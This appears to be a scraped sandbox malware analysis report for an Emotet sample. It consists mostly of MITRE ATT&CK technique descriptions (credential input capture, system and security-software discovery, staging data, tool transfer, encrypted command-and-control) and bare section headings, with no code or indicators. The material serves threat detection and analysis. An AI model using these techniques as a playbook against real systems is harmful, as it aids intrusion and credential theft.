Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report M2hsMd9hTq

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre